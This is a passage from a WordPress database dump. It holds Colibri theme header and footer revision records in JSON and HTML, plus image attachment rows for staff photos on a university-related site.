255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-13 10:39:42','2023-10-13 14:39:42','',26,'https://gsudice.dataconn.net/?p=1768',0,'revision','',0),(1769,1,'2023-10-13 10:39:42','2023-10-13 14:39:42','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-13 10:39:42','2023-10-13 14:39:42','',25,'https://gsudice.dataconn.net/?p=1769',0,'revision','',0),(1770,1,'2023-10-13 10:39:42','2023-10-13 14:39:42','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-13 10:39:42','2023-10-13 14:39:42','',29,'https://gsudice.dataconn.net/?p=1770',0,'revision','',0),(1771,1,'2023-10-13 10:39:42','2023-10-13 14:39:42','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-13 10:39:42','2023-10-13 14:39:42','',28,'https://gsudice.dataconn.net/?p=1771',0,'revision','',0),(1772,1,'2023-10-13 10:42:41','2023-10-13 14:42:41','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg','Sarah_Akinola','','inherit','open','closed','','sarah_akinola-3','','','2023-10-13 10:42:41','2023-10-13 14:42:41','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg',0,'attachment','image/jpeg',0),(1774,1,'2023-10-13 10:44:17','2023-10-13 14:44:17','','Eliza Schuh','','inherit','open','closed','','eliza-schuh','','','2023-10-13 10:44:17','2023-10-13 14:44:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/Eliza-Schuh.jpg',0,'attachment','image/jpeg',0),(1778,1,'2023-10-13 10:45:53','2023-10-13 14:45:53','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-Eliza-Schuh.jpg','cropped-Eliza-Schuh.jpg','','inherit','open','closed','','cropped-eliza-schuh-jpg-2','','','2023-10-13 10:45:53','2023-10-13 14:45:53','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Eliza-Schuh-e1697208271242.jpg',0,'attachment','image/jpeg',0),(1779,1,'2023-10-13 10:47:59','2023-10-13 14:47:59','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg','cropped-cropped-Anvith.jpg','','inherit','open','closed','','cropped-cropped-anvith-jpg','','','2023-10-13 10:48:21','2023-10-13 14:48:21','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Anvith.jpg',0,'attachment','image/jpeg',0),(1780,1,'2023-10-13 10:48:24','2023-10-13 14:48:24','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg','cropped-cropped-Anvith.jpg','','inherit','open','closed','','cropped-cropped-anvith-jpg-2','','','2023-10-13 10:48:24','2023-10-13 14:48:24','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg',0,'attachment','image/jpeg',0),(1781,1,'2023-10-13 10:49:02','2023-10-13 14:49:02','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg','cropped-Alex.jpg','','inherit','open','closed','','cropped-alex-jpg','','','2023-10-13 10:50:31','2023-10-13 14:50:31','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg',0,'attachment','image/jpeg',0),(1782,1,'2023-10-13 10:50:33','2023-10-13 14:50:33','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg','cropped-Alex.jpg','','inherit','open','closed','','cropped-alex-jpg-2','','','2023-10-13 10:50:33','2023-10-13 